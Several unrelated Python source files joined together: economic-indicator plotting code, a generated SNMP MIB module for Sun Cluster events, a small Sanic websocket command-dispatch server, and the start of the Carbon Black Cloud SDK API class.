lag_date = date + relativedelta.relativedelta(months=16)
nyfed[lag_date] = self.NYFED[self.NYFED[:,0]==date,1][0]
for ss in range(self.CPI.shape[0]):
date = self.CPI[ss,0]
if not isinstance(date, datetime.date) or date.date() < cpi_start_date:
continue
cpi[date] = self.CPI[self.CPI[:,0]==date,1][0]
self.lcpi = sorted(cpi.items())
self.lnyfed = sorted(nyfed.items())
xcpi, ycpi = zip(*self.lcpi)
xnyfed, ynyfed = zip(*self.lnyfed)
self.xcpi , self.ycpi = xcpi, ycpi
self.xnyfed, self.ynyfed = xnyfed, ynyfed
ser_cpi = pd.Series(ycpi, index=xcpi)
ser_nyfed = pd.Series(ynyfed, index=xnyfed)
res_cpi = ser_cpi.resample('D').interpolate(method='linear')
res_nyfed = ser_nyfed.resample('D').interpolate(method='linear')
start_date = max([min(res_cpi.index),min(res_nyfed.index)])
end_date = min([max(res_cpi.index),max(res_nyfed.index)])
self.res_cpi = res_cpi.loc[start_date:end_date]
self.res_nyfed = res_nyfed.loc[start_date:end_date]
# self.res_cpi.plot()
self.cpi_nyfed_cor = np.corrcoef(self.res_cpi, self.res_nyfed)
def coreCPIvsGDP(self,cpi_start_date=datetime.date(1998, 1, 1)):
gdp_start_date = cpi_start_date - relativedelta.relativedelta(months=23)
gdp = {}
cpi = {}
for ss in range(self.GDP.shape[0]):
date = self.GDP[ss,0]
if not isinstance(date,datetime.date) or date.date() < gdp_start_date:
continue
lag_date = date + relativedelta.relativedelta(months=16)
gdp[lag_date] = self.GDP[self.GDP[:,0]==date,1][0]
for ss in range(self.CPI.shape[0]):
date = self.CPI[ss,0]
if not isinstance(date, datetime.date) or date.date() < cpi_start_date:
continue
cpi[date] = self.CPI[self.CPI[:,0]==date,1][0]
self.lcpi = sorted(cpi.items())
self.lgdp = sorted(gdp.items())
xcpi, ycpi = zip(*self.lcpi)
xgdp, ygdp = zip(*self.lgdp)
self.xcpi , self.ycpi = xcpi, ycpi
self.xgdp, self.ygdp = xgdp, ygdp
ser_cpi = pd.Series(ycpi, index=xcpi)
ser_gdp = pd.Series(ygdp, index=xgdp)
res_cpi = ser_cpi.resample('D').interpolate(method='linear')
res_gdp = ser_gdp.resample('D').interpolate(method='linear')
start_date = max([min(res_cpi.index),min(res_gdp.index)])
end_date = min([max(res_cpi.index),max(res_gdp.index)])
self.res_cpi = res_cpi.loc[start_date:end_date]
self.res_gdp = res_gdp.loc[start_date:end_date]
# self.res_cpi.plot()
self.cpi_gdp_cor = np.corrcoef(self.res_cpi, self.res_gdp)
#%% Plot
def plotCPIvsGDP(self, cpi_start_date=datetime.date(1998, 1, 1)):
self.coreCPIvsGDP(cpi_start_date=cpi_start_date)
fig = plt.figure(figsize=(15,7))
ax = fig.add_subplot(111)
xcpi, ycpi = zip(*self.lcpi)
xgdp, ygdp = zip(*self.lgdp)
gdp_curve, = ax.plot(xgdp,ygdp,lw=3,color='r',alpha=1, label='Real GDP (YoY)')
ax2 = ax.twinx()
cpi_curve, = ax2.plot(xcpi,ycpi,lw=3,color='b',alpha=0.9,label='CPI (YoY)')
ax.tick_params(labelsize=20)
ax2.tick_params(labelsize=20)
ax.tick_params(axis='y', colors=gdp_curve.get_color())
ax2.tick_params(axis='y', colors=cpi_curve.get_color())
ybounds = ax.get_ybound()
ax.fill_betweenx(ybounds,Recessions[2001][0], Recessions[2001][1] ,color='r',alpha=0.3)
shade = ax.fill_betweenx(ybounds,Recessions[2007][0], Recessions[2007][1] ,color='r',alpha=0.3,label='recession')
lines = [gdp_curve, cpi_curve, shade]
ax.legend(lines, [l.get_label() for l in lines], loc='lower right', fontsize=25)
ax.set_title('Core CPI and Real GDP (16mo Lead): Corr = {}'.format(round(self.cpi_gdp_cor[0,1],3)),fontsize=25)
return fig
#%% Plot
def plotCPIvsNYFED(self):
self.coreCPIvsNYFED()
xcpi, ycpi = zip(*self.lcpi)
xnyfed, ynyfed = zip(*self.lnyfed)
fig = plt.figure(figsize=(15,7))
ax = fig.add_subplot(111)
nyfed_curve, = ax.plot(xnyfed,ynyfed,lw=3,color='r',alpha=1, label='NY Fed Inflation')
ax2 = ax.twinx()
cpi_curve, = ax2.plot(xcpi,ycpi,lw=3,color='b',alpha=0.9,label='CPI (YoY)')
ax.tick_params(labelsize=20)
ax2.tick_params(labelsize=20)
ax.tick_params(axis='y', colors=nyfed_curve.get_color())
ax2.tick_params(axis='y', colors=cpi_curve.get_color())
ybounds = ax.get_ybound()
ax.fill_betweenx(ybounds,Recessions[2001][0], Recessions[2001][1] ,color='r',alpha=0.3)
shade = ax.fill_betweenx(ybounds,Recessions[2007][0], Recessions[2007][1] ,color='r',alpha=0.3,label='recession')
lines = [nyfed_curve, cpi_curve, shade]
ax.legend(lines, [l.get_label() for l in lines], loc='lower right', fontsize=25)
ax.set_title('Core CPI and NY Fed Inflation (16mo Lead): Corr = {}'.format(round(self.cpi_nyfed_cor[0,1],3)),fontsize=25)
return fig
#%% Plot confidence scores
def plotConfidenceScores(self):
self.confidenceScores()
fig = plt.figure(figsize=(15,7))
ax = fig.add_subplot(111)
lhbc = sorted(self.zhbc.items())
lceoc = sorted(self.zceoc.items())
lsbo = sorted(self.zsbo.items())
lcc= sorted(self.zcc.items())
lmean = sorted(self.zmeanconf.items())
xcc,ycc = zip(*lcc)
xhbc,yhbc = zip(*lhbc)
xceoc, yceoc = zip(*lceoc)
xsbo, ysbo = zip(*lsbo)
xmean, ymean = zip(*lmean)
ax.plot(xcc,ycc,lw=3,color='blue')
ax.plot(xceoc, yceoc,color='red',lw=3)
ax.plot(xhbc, yhbc, color='orange',lw=3)
ax.plot(xsbo, ysbo, color='green',lw=3)
ax.plot(xmean, ymean, color='black',lw=3)
ax.grid(axis='y')
ax.set_ylabel('z-score',fontsize=20)
ax.set_ylim(-4,3)
ax.tick_params(labelsize=20)
recession = Recessions[2007]
ax.fill_betweenx([-4,3], recession[0], recession[1], color='gray',alpha=0.5)
ax.legend(['Consumer Conf','CEO Conf','Home Builders Conf','Small Busi Opt.', 'Average','Recession'],fontsize=18)
plt.gca().xaxis.set_major_formatter(mdates.DateFormatter('%m-%Y'))
plt.gcf().autofmt_xdate()
return fig
#%%
def plotDummyCPIvCapacityUtil(self):
self.coreCPIvCapacityUtil()
fig = plt.figure(figsize=(15,7))
ax = fig.add_subplot(111)
# print(self.cpi_caputil_corr)
cu_curve, = ax.plot(self.res_cu.index, self.res_cu.values,lw=3,color='r',alpha=1, label='Capacity Util.')
ax2 = ax.twinx()
cpi_curve, = ax2.plot(self.res_cpi.index, self.res_cpi.values,lw=3,color='b',alpha=0.9,label='CPI (YoY)')
ax.tick_params(labelsize=20)
ax2.tick_params(labelsize=20)
ax.tick_params(axis='y', colors=cu_curve.get_color())
ax2.tick_params(axis='y', colors=cpi_curve.get_color())
ybounds = ax.get_ybound()
ax.fill_betweenx(ybounds, self.Recessions[2001][0], self.Recessions[2001][1],
color='r',alpha=0.3)
shade = ax.fill_betweenx(ybounds, self.Recessions[2007][0], self.Recessions[2007][1],
color='r',alpha=0.3,label='recession')
lines = [cu_curve, cpi_curve, shade]
ax.legend(lines, [l.get_label() for l in lines], loc='lower right', fontsize=25)
ax.set_title('Core CPI and Capacity Utilization: Corr = {}'.format(round(self.cpi_caputil_cor[0,1],3)),fontsize=25)
return fig
#%%
def plotCPIvCapacityUtil(self):
self.coreCPIvCapacityUtil()
fig = plt.figure(figsize=(15,7))
ax = fig.add_subplot(111)
# print(self.cpi_caputil_corr)
cu_curve, = ax.plot(self.xcu, self.ycu,lw=3,color='r',alpha=1, label='Capacity Util.')
ax2 = ax.twinx()
cpi_curve, = ax2.plot(self.xcpi, self.ycpi,lw=3,color='b',alpha=0.9,label='CPI (YoY)')
ax.tick_params(labelsize=20)
ax2.tick_params(labelsize=20)
ax.tick_params(axis='y', colors=cu_curve.get_color())
ax2.tick_params(axis='y', colors=cpi_curve.get_color())
ybounds = ax.get_ybound()
ax.fill_betweenx(ybounds, self.Recessions[2001][0], self.Recessions[2001][1],
color='r',alpha=0.3)
shade = ax.fill_betweenx(ybounds, self.Recessions[2007][0], self.Recessions[2007][1],
color='r',alpha=0.3,label='recession')
lines = [cu_curve, cpi_curve, shade]
ax.legend(lines, [l.get_label() for l in lines], loc='lower right', fontsize=25)
ax.set_title('Core CPI and Capacity Utilization (16mo Lead): Corr = {}'.format(round(self.cpi_caputil_cor[0,1],3)),fontsize=25)
return fig
#%% Plot
def plotCPIvsPMI(self):
self.coreCPIvsISMPMI()
lcpi = sorted(self.cpi.items())
lpmi = sorted(self.pmi.items())
xcpi, ycpi = zip(*lcpi)
xpmi, ypmi = zip(*lpmi)
fig = plt.figure(figsize=(15,7))
ax = fig.add_subplot(111)
pmi_curve, = ax.plot(xpmi,ypmi,lw=3,color='r',alpha=1, label='ISM PMI')
ax2 = ax.twinx()
cpi_curve, = ax2.plot(xcpi,ycpi,lw=3,color='b',alpha=0.9,label='CPI (YoY)')
ax.tick_params(labelsize=20)
ax2.tick_params(labelsize=20)
ax.tick_params(axis='y', colors=pmi_curve.get_color())
ax2.tick_params(axis='y', colors=cpi_curve.get_color())
ybounds = ax.get_ybound()
ax.fill_betweenx(ybounds,Recessions[2001][0], Recessions[2001][1] ,color='r',alpha=0.3)
shade = ax.fill_betweenx(ybounds,Recessions[2007][0], Recessions[2007][1] ,color='r',alpha=0.3,label='recession')
lines = [pmi_curve, cpi_curve, shade]
ax.legend(lines, [l.get_label() for l in lines], loc='lower right', fontsize=25)
ax.set_title('Core CPI and ISM PMI (23mo Lead): Corr = {}'.format(round(self.cpi_pmi_cor[0,1],3)),fontsize=25)
return fig
def plotDummyCPIvsPMI(self):
self.coreCPIvsISMPMI()
lcpi = sorted(self.cpi.items())
lpmi = sorted(self.pmi.items())
xcpi, ycpi = zip(*lcpi)
xpmi, ypmi = zip(*lpmi)
fig = plt.figure(figsize=(15,7))
ax = fig.add_subplot(111)
ax.scatter(self.res_cpi.values, self.res_pmi.values,s=10)
# pmi_curve, = ax.plot(self.res_pmi.index, self.res_pmi.values,lw=3,color='r',alpha=1, label='ISM PMI')
#
# ax2 = ax.twinx()
# cpi_curve, = ax2.plot(self.res_cpi.index,self.res_cpi.values,lw=3,color='b',alpha=0.9,label='CPI (YoY)')
#
# ax.tick_params(labelsize=20)
# ax2.tick_params(labelsize=20)
#
# ax.tick_params(axis='y', colors=pmi_curve.get_color())
# ax2.tick_params(axis='y', colors=cpi_curve.get_color())
#
# ybounds = ax.get_ybound()
#
# ax.fill_betweenx(ybounds,Recessions[2001][0], Recessions[2001][1] ,color='r',alpha=0.3)
# shade = ax.fill_betweenx(ybounds,Recessions[2007][0], Recessions[2007][1] ,color='r',alpha=0.3,label='recession')
#
# lines = [pmi_curve, cpi_curve, shade]
# ax.legend(lines, [l.get_label() for l in lines], loc='lower right', fontsize=25)
# ax.set_title('Core CPI and ISM PMI: Corr = {}'.format(round(self.cpi_pmi_cor[0,1],3)),fontsize=25)
#
return fig
#%% Plots
def plotHighYeild(self):
#dates=[datetime.date(int(el.split('/')[2]), int(el.split('/')[0]), int(el.split('/')[1])) for el in self.HYS[2:,0] if ((not isinstance(el, float)) and ('/' in el) and (len(el)<15) )]
entry = self.HYS[4,0]
if isinstance(entry, datetime.date):
end_date=entry
else:
try:
end_date=datetime.datetime.strptime(entry,'%m/%d/%Y').date()
except TypeError:
print("Cannot parse '{}' as date. Check entry 5 of 'HY Spreads'. See 'plotHighYield' method in 'ChartAppPlots.py' to change end_date'".format(entry))
#print("End date: {}".format(end_date))
self.HighYeildSpread(scope=600, data_end_date=end_date)
fig = plt.figure(figsize=(15,7))
ax = fig.add_subplot(111)
#%%
l2001 = sorted(self.recession_2001.items())
l2007 = sorted(self.recession_2007.items())
l6mo = sorted(self.six_mos_to_recession.items())
l1yr = sorted(self.one_year_to_recession.items())
x2001, y2001 = zip(*l2001)
x2007, y2007 = zip(*l2007)
x6mo, y6mo = zip(*l6mo)
x1yr, y1yr = zip(*l1yr)
ax.plot(x2001, y2001,lw=3,color='b',alpha=0.9)
ax.plot(x2007, y2007,lw=3,color='yellow',alpha=0.9)
ax.plot(x6mo, y6mo,lw=3,color='k',alpha=0.9)
ax.plot(x6mo[:len(x1yr)], y1yr,lw=3,color='g',alpha=0.9)
ax.grid(axis='y')
ybounds = ax.get_ybound()
ax.fill_betweenx(ybounds, 1,self.HYscope, alpha=0.5)
xticks = range(-self.HYscope,self.HYscope,40)
ax.set_xticks(xticks)
ax.set_xticklabels(xticks)
ax.set_yticklabels([0,5,10,15,20])
#ax.set_ylabel('YoY (%)',fontsize=20)
ax.set_xlabel('Trading Days to Recession',fontsize=20)
ax.tick_params(labelsize=20)
ax.legend(['2001', '2007', 'Now (6mo to Recession)', 'Now (1yr to Recession)', 'Recession'],fontsize=25)
ax.set_xlim(-self.HYscope-2, self.HYscope+5)
plt.xticks(rotation='vertical')
return fig
#%%
def plotLEI(self):
self.leadingEconomicIndicators(24)
fig = plt.figure(figsize=(15,7))
ax = fig.add_subplot(111)
xmean,ymean = zip(*self.leimean)
x25, y25 = zip(*self.lei25)
x75, y75 = zip(*self.lei75)
mons, vals = zip(*self.leicurr)
months_to_ = x25[:len(vals)]
ax.grid(axis='y')
ax.fill_between(x25, y25, y75, alpha=0.5,linewidth=1,linestyle='dashed',edgecolor='r')
ax.plot(months_to_,vals,lw=3,color='b',alpha=0.9)
xticks = [-24,-20,-16,-12,-8,-4,0,4,8,12,16,20,24]
ax.set_xticks(xticks)
ax.set_xticklabels(xticks)
ax.set_ylabel('LEI YoY (%)',fontsize=20)
ax.set_xlabel('Months Leading up to Recession',fontsize=20)
ax.tick_params(labelsize=20)
ybounds = ax.get_ybound()
xbounds = ax.get_xbound()
ax.legend(['Current (1yr to Rec.)', '25th/75th %le'], fontsize=25, loc='lower left')
ax.set_xlim(xmean[0]-.5, xmean[-1]+.5)
ax.vlines(0, ybounds[0], ybounds[1], linestyle='dashed',lw=3)
ax.hlines(0, xmean[0], xbounds[1], lw=3,color='gray')
return fig
#%% Plots
def plotPMItoRecession(self):
self.pmiLeadingToRecession(24)
fig = plt.figure(figsize=(15,7))
ax = fig.add_subplot(111)
xmean,ymean = zip(*self.pmimean)
x25, y25 = zip(*self.pmi25)
x75, y75 = zip(*self.pmi75)
months_to, vals = zip(*self.pmicurr)
ax.plot(months_to,vals,lw=3,color='k',alpha=0.9)
ax.grid(axis='y')
ax.fill_between(x25, y25, y75, alpha=0.5,linewidth=1,linestyle='dashed',edgecolor='r')
xticks = [-24,-20,-16,-12,-8,-4,0,4,8,12,16,20,24]
ax.set_xticks(xticks)
ax.set_xticklabels(xticks)
ax.set_ylabel('PMI YoY (%)',fontsize=20)
ax.set_xlabel('Months Leading up to Recession',fontsize=20)
ax.tick_params(labelsize=20)
ybounds = ax.get_ybound()
ax.legend(['Current (1yr to Rec.)', '25th/75th %le'], fontsize=25,loc='lower left')
ax.set_xlim(xmean[0]-.5, xmean[-1]+.5)
ax.vlines(0, ybounds[0], ybounds[1], linestyle='dashed',lw=3)
return fig
|
#
# PySNMP MIB module SUN-CLUSTER-EVENTS-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/SUN-CLUSTER-EVENTS-MIB
# Produced by pysmi-0.3.4 at Mon Apr 29 21:04:15 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
OctetString, ObjectIdentifier, Integer = mibBuilder.importSymbols("ASN1", "OctetString", "ObjectIdentifier", "Integer")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ValueSizeConstraint, ConstraintsIntersection, ConstraintsUnion, SingleValueConstraint, ValueRangeConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueSizeConstraint", "ConstraintsIntersection", "ConstraintsUnion", "SingleValueConstraint", "ValueRangeConstraint")
ModuleCompliance, NotificationGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "NotificationGroup")
Unsigned32, Bits, Integer32, iso, ObjectIdentity, IpAddress, Counter32, TimeTicks, MibIdentifier, Gauge32, NotificationType, ModuleIdentity, Counter64, MibScalar, MibTable, MibTableRow, MibTableColumn = mibBuilder.importSymbols("SNMPv2-SMI", "Unsigned32", "Bits", "Integer32", "iso", "ObjectIdentity", "IpAddress", "Counter32", "TimeTicks", "MibIdentifier", "Gauge32", "NotificationType", "ModuleIdentity", "Counter64", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn")
TextualConvention, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "TextualConvention", "DisplayString")
sunClusterEventsMIB = ModuleIdentity((1, 3, 6, 1, 4, 1, 42, 2, 80, 2))
sunClusterEventsMIB.setRevisions(('1902-11-30 00:00',))
if mibBuilder.loadTexts: sunClusterEventsMIB.setLastUpdated('0211300000Z')
if mibBuilder.loadTexts: sunClusterEventsMIB.setOrganization('Sun Microsystems')
sun = MibIdentifier((1, 3, 6, 1, 4, 1, 42))
prod = MibIdentifier((1, 3, 6, 1, 4, 1, 42, 2))
suncluster = MibIdentifier((1, 3, 6, 1, 4, 1, 42, 2, 80))
scEventsMIBObjects = MibIdentifier((1, 3, 6, 1, 4, 1, 42, 2, 80, 2, 1))
scEventsMIBNotifications = MibIdentifier((1, 3, 6, 1, 4, 1, 42, 2, 80, 2, 2))
class ScEventTableCount(TextualConvention, Integer32):
status = 'current'
subtypeSpec = Integer32.subtypeSpec + ValueRangeConstraint(20, 32767)
class ScEventIndex(TextualConvention, Integer32):
status = 'current'
class ScClusterId(DisplayString):
status = 'current'
class ScClusterName(DisplayString):
status = 'current'
class ScNodeName(DisplayString):
status = 'current'
class ScEventVersion(TextualConvention, Integer32):
status = 'current'
class ScEventClassName(DisplayString):
status = 'current'
class ScEventSubclassName(DisplayString):
status = 'current'
class ScEventSeverity(TextualConvention, Integer32):
status = 'current'
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(0, 1, 2, 3, 4))
namedValues = NamedValues(("clEventSevInfo", 0), ("clEventSevWarning", 1), ("clEventSevError", 2), ("clEventSevCritical", 3), ("clEventSevFatal", 4))
class ScEventInitiator(TextualConvention, Integer32):
status = 'current'
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(0, 1, 2, 3))
namedValues = NamedValues(("clEventInitUnknown", 0), ("clEventInitSystem", 1), ("clEventInitOperator", 2), ("clEventInitAgent", 3))
class ScEventPublisher(DisplayString):
status = 'current'
class ScEventPid(TextualConvention, Counter64):
status = 'current'
class ScTimeStamp(TextualConvention, Counter64):
status = 'current'
class ScEventData(DisplayString):
status = 'current'
class ScEventAttributeName(DisplayString):
status = 'current'
class ScEventAttributeValue(DisplayString):
status = 'current'
escEventTableCount = MibScalar((1, 3, 6, 1, 4, 1, 42, 2, 80, 2, 1, 1), ScEventTableCount()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: escEventTableCount.setStatus('current')
escEventsTable = MibTable((1, 3, 6, 1, 4, 1, 42, 2, 80, 2, 1, 2), )
if mibBuilder.loadTexts: escEventsTable.setStatus('current')
escEventsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 42, 2, 80, 2, 1, 2, 1), ).setIndexNames((0, "SUN-CLUSTER-EVENTS-MIB", "eventIndex"))
if mibBuilder.loadTexts: escEventsEntry.setStatus('current')
eventIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 42, 2, 80, 2, 1, 2, 1, 1), ScEventIndex()).setMaxAccess("readonly")
if mibBuilder.loadTexts: eventIndex.setStatus('current')
eventClusterId = MibTableColumn((1, 3, 6, 1, 4, 1, 42, 2, 80, 2, 1, 2, 1, 2), ScClusterId()).setMaxAccess("readonly")
if mibBuilder.loadTexts: eventClusterId.setStatus('current')
eventClusterName = MibTableColumn((1, 3, 6, 1, 4, 1, 42, 2, 80, 2, 1, 2, 1, 3), ScClusterName()).setMaxAccess("readonly")
if mibBuilder.loadTexts: eventClusterName.setStatus('current')
eventNodeName = MibTableColumn((1, 3, 6, 1, 4, 1, 42, 2, 80, 2, 1, 2, 1, 4), ScNodeName()).setMaxAccess("readonly")
if mibBuilder.loadTexts: eventNodeName.setStatus('current')
eventVersion = MibTableColumn((1, 3, 6, 1, 4, 1, 42, 2, 80, 2, 1, 2, 1, 5), ScEventVersion()).setMaxAccess("readonly")
if mibBuilder.loadTexts: eventVersion.setStatus('current')
eventClassName = MibTableColumn((1, 3, 6, 1, 4, 1, 42, 2, 80, 2, 1, 2, 1, 6), ScEventClassName()).setMaxAccess("readonly")
if mibBuilder.loadTexts: eventClassName.setStatus('current')
eventSubclassName = MibTableColumn((1, 3, 6, 1, 4, 1, 42, 2, 80, 2, 1, 2, 1, 7), ScEventSubclassName()).setMaxAccess("readonly")
if mibBuilder.loadTexts: eventSubclassName.setStatus('current')
eventSeverity = MibTableColumn((1, 3, 6, 1, 4, 1, 42, 2, 80, 2, 1, 2, 1, 8), ScEventSeverity()).setMaxAccess("readonly")
if mibBuilder.loadTexts: eventSeverity.setStatus('current')
eventInitiator = MibTableColumn((1, 3, 6, 1, 4, 1, 42, 2, 80, 2, 1, 2, 1, 9), ScEventInitiator()).setMaxAccess("readonly")
if mibBuilder.loadTexts: eventInitiator.setStatus('current')
eventPublisher = MibTableColumn((1, 3, 6, 1, 4, 1, 42, 2, 80, 2, 1, 2, 1, 10), ScEventPublisher()).setMaxAccess("readonly")
if mibBuilder.loadTexts: eventPublisher.setStatus('current')
eventSeqNo = MibTableColumn((1, 3, 6, 1, 4, 1, 42, 2, 80, 2, 1, 2, 1, 11), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: eventSeqNo.setStatus('current')
eventPid = MibTableColumn((1, 3, 6, 1, 4, 1, 42, 2, 80, 2, 1, 2, 1, 12), ScEventPid()).setMaxAccess("readonly")
if mibBuilder.loadTexts: eventPid.setStatus('current')
eventTimeStamp = MibTableColumn((1, 3, 6, 1, 4, 1, 42, 2, 80, 2, 1, 2, 1, 13), ScTimeStamp()).setMaxAccess("readonly")
if mibBuilder.loadTexts: eventTimeStamp.setStatus('current')
eventData = MibTableColumn((1, 3, 6, 1, 4, 1, 42, 2, 80, 2, 1, 2, 1, 14), ScEventData()).setMaxAccess("readonly")
if mibBuilder.loadTexts: eventData.setStatus('current')
escEventsAttributesTable = MibTable((1, 3, 6, 1, 4, 1, 42, 2, 80, 2, 1, 3), )
if mibBuilder.loadTexts: escEventsAttributesTable.setStatus('current')
escEventsAttributesEntry = MibTableRow((1, 3, 6, 1, 4, 1, 42, 2, 80, 2, 1, 3, 1), ).setIndexNames((0, "SUN-CLUSTER-EVENTS-MIB", "eventIndex"), (0, "SUN-CLUSTER-EVENTS-MIB", "attributeName"))
if mibBuilder.loadTexts: escEventsAttributesEntry.setStatus('current')
attributeName = MibTableColumn((1, 3, 6, 1, 4, 1, 42, 2, 80, 2, 1, 3, 1, 1), ScEventAttributeName())
if mibBuilder.loadTexts: attributeName.setStatus('current')
attributeValue = MibTableColumn((1, 3, 6, 1, 4, 1, 42, 2, 80, 2, 1, 3, 1, 2), ScEventAttributeValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: attributeValue.setStatus('current')
escNewEvents = NotificationType((1, 3, 6, 1, 4, 1, 42, 2, 80, 2, 2, 1)).setObjects(("SUN-CLUSTER-EVENTS-MIB", "eventIndex"), ("SUN-CLUSTER-EVENTS-MIB", "eventClusterId"), ("SUN-CLUSTER-EVENTS-MIB", "eventClusterName"), ("SUN-CLUSTER-EVENTS-MIB", "eventNodeName"), ("SUN-CLUSTER-EVENTS-MIB", "eventVersion"), ("SUN-CLUSTER-EVENTS-MIB", "eventClassName"), ("SUN-CLUSTER-EVENTS-MIB", "eventSubclassName"), ("SUN-CLUSTER-EVENTS-MIB", "eventSeverity"), ("SUN-CLUSTER-EVENTS-MIB", "eventInitiator"), ("SUN-CLUSTER-EVENTS-MIB", "eventPublisher"), ("SUN-CLUSTER-EVENTS-MIB", "eventSeqNo"), ("SUN-CLUSTER-EVENTS-MIB", "eventPid"), ("SUN-CLUSTER-EVENTS-MIB", "eventTimeStamp"), ("SUN-CLUSTER-EVENTS-MIB", "eventData"))
if mibBuilder.loadTexts: escNewEvents.setStatus('current')
mibBuilder.exportSymbols("SUN-CLUSTER-EVENTS-MIB", ScEventData=ScEventData, ScEventSubclassName=ScEventSubclassName, eventClusterName=eventClusterName, escEventsAttributesTable=escEventsAttributesTable, eventClusterId=eventClusterId, eventInitiator=eventInitiator, prod=prod, escEventTableCount=escEventTableCount, escEventsAttributesEntry=escEventsAttributesEntry, eventPublisher=eventPublisher, escEventsTable=escEventsTable, ScEventIndex=ScEventIndex, ScEventAttributeValue=ScEventAttributeValue, scEventsMIBObjects=scEventsMIBObjects, eventNodeName=eventNodeName, ScEventAttributeName=ScEventAttributeName, attributeName=attributeName, escEventsEntry=escEventsEntry, eventSeqNo=eventSeqNo, ScTimeStamp=ScTimeStamp, attributeValue=attributeValue, eventVersion=eventVersion, eventSubclassName=eventSubclassName, ScEventInitiator=ScEventInitiator, ScEventClassName=ScEventClassName, escNewEvents=escNewEvents, PYSNMP_MODULE_ID=sunClusterEventsMIB, scEventsMIBNotifications=scEventsMIBNotifications, ScNodeName=ScNodeName, eventTimeStamp=eventTimeStamp, ScEventSeverity=ScEventSeverity, eventIndex=eventIndex, ScEventPublisher=ScEventPublisher, eventSeverity=eventSeverity, eventData=eventData, eventPid=eventPid, suncluster=suncluster, ScEventPid=ScEventPid, sunClusterEventsMIB=sunClusterEventsMIB, ScClusterId=ScClusterId, sun=sun, ScEventTableCount=ScEventTableCount, ScClusterName=ScClusterName, eventClassName=eventClassName, ScEventVersion=ScEventVersion)
|
import json
import asyncio
import threading
from sanic import Sanic, response
from sanic.websocket import WebSocketProtocol
from hhagent.meta import BANNER
from hhagent.tools import manifest
app = Sanic(name='hhagent')
async def _consumer_handler(ws):
while True:
# TODO: do things here interactively
data = await ws.recv()
json_data = json.loads(data)
target_func = None
command = json_data['command']
# args = json_data['args']
if command in manifest:
target_func = manifest[command]
if target_func:
# TODO: comeback to this, fix args
t = threading.Thread(target=target_func) #, args=[*args.values()])
t.daemon = True
t.start()
async def _producer_handler(ws):
# TODO: send data back to the websocket
await ws.send('hello')
await asyncio.sleep(1)
@app.websocket('/hhagent_connect')
async def hhagent_connect(request, ws):
# TODO: do things here for initial connect
while True:
consumer_task = asyncio.ensure_future(_consumer_handler(ws))
producer_task = asyncio.ensure_future(_producer_handler(ws))
done, pending = await asyncio.wait(
[consumer_task, producer_task],
return_when=asyncio.FIRST_COMPLETED
)
for task in pending:
task.cancel()
def start_server():
print(BANNER)
app.run('0.0.0.0', port=1337, protocol=WebSocketProtocol)
|
#!/usr/bin/env python3
# *******************************************************
# Copyright (c) VMware, Inc. 2020. All Rights Reserved.
# SPDX-License-Identifier: MIT
# *******************************************************
# *
# * DISCLAIMER. THIS PROGRAM IS PROVIDED TO YOU "AS IS" WITHOUT
# * WARRANTIES OR CONDITIONS OF ANY KIND, WHETHER ORAL OR WRITTEN,
# * EXPRESS OR IMPLIED. THE AUTHOR SPECIFICALLY DISCLAIMS ANY IMPLIED
# * WARRANTIES OR CONDITIONS OF MERCHANTABILITY, SATISFACTORY QUALITY,
# * NON-INFRINGEMENT AND FITNESS FOR A PARTICULAR PURPOSE.
"""Definition of the CBCloudAPI object, the core object for interacting with the Carbon Black Cloud SDK."""
from cbc_sdk.connection import BaseAPI
from cbc_sdk.errors import ApiError, CredentialError, ServerError
from cbc_sdk.live_response_api import LiveResponseSessionManager
from cbc_sdk.audit_remediation import Run, RunHistory
from cbc_sdk.enterprise_edr.threat_intelligence import ReportSeverity
import logging
import time
from concurrent.futures import ThreadPoolExecutor
log = logging.getLogger(__name__)
class CBCloudAPI(BaseAPI):
"""The main entry point into the CBCloudAPI.
:param str profile: (optional) Use the credentials in the named profile when connecting to the Carbon Black server.
Uses the profile named 'default' when not specified.
Usage::
>>> from cbc_sdk import CBCloudAPI
>>> cb = CBCloudAPI(profile="production")
"""
def __init__(self, *args, **kwargs):
super(CBCloudAPI, self).__init__(*args, **kwargs)
self._thread_pool_count = kwargs.pop('thread_pool_count', 1)
self._lr_scheduler = None
self._async_executor = None
if not self.credentials.org_key:
raise CredentialError("No organization key specified")
def _perform_query(self, cls, **kwargs):
if hasattr(cls, "_query_implementation"):
return cls._query_implementation(self, **kwargs)
else:
raise ApiError("All Carbon Black Cloud models must provide _query_implementation")
# ---- Async
def _async_submit(self, callable, *args, **kwargs):
"""
Submit a task to the executor, creating it if it doesn't yet exist.
Args:
callable (func): A callable to be executed as a background task.
*args (list): Arguments to be passed to the callable.
**kwargs (dict): Keyword arguments to be passed to the callable.
Returns:
Future: A future object representing the background task, which will pass along the result.
"""
if not self._async_executor:
self._async_executor = ThreadPoolExecutor(max_workers=self._thread_pool_count)
return self._async_executor.submit(callable, args, kwargs)
# ---- LiveOps
@property
def live_response(self):
if self._lr_scheduler is None:
self._lr_scheduler = LiveResponseSessionManager(self)
return self._lr_scheduler
def _request_lr_session(self, sensor_id):
return self.live_response.request_session(sensor_id)
# ---- Audit and Remediation
def audit_remediation(self, sql):
return self.select(Run).where(sql=sql)
def audit_remediation_history(self, query=None):
return self.select(RunHistory).where(query)
# ---- Notifications
def notification_listener(self, interval=60):
"""Generator to continually poll the Cb Endpoint Standard server for notifications (alerts). Note that this can only
be used with a 'SIEM' key generated in the Cb Endpoint Standard console.
"""
while True:
for notification in self.get_notifications():
yield notification
time.sleep(interval)
def get_notifications(self):
"""Retrieve queued notifications (alerts) from the Cb Endpoint Standard server. Note that this can only be used
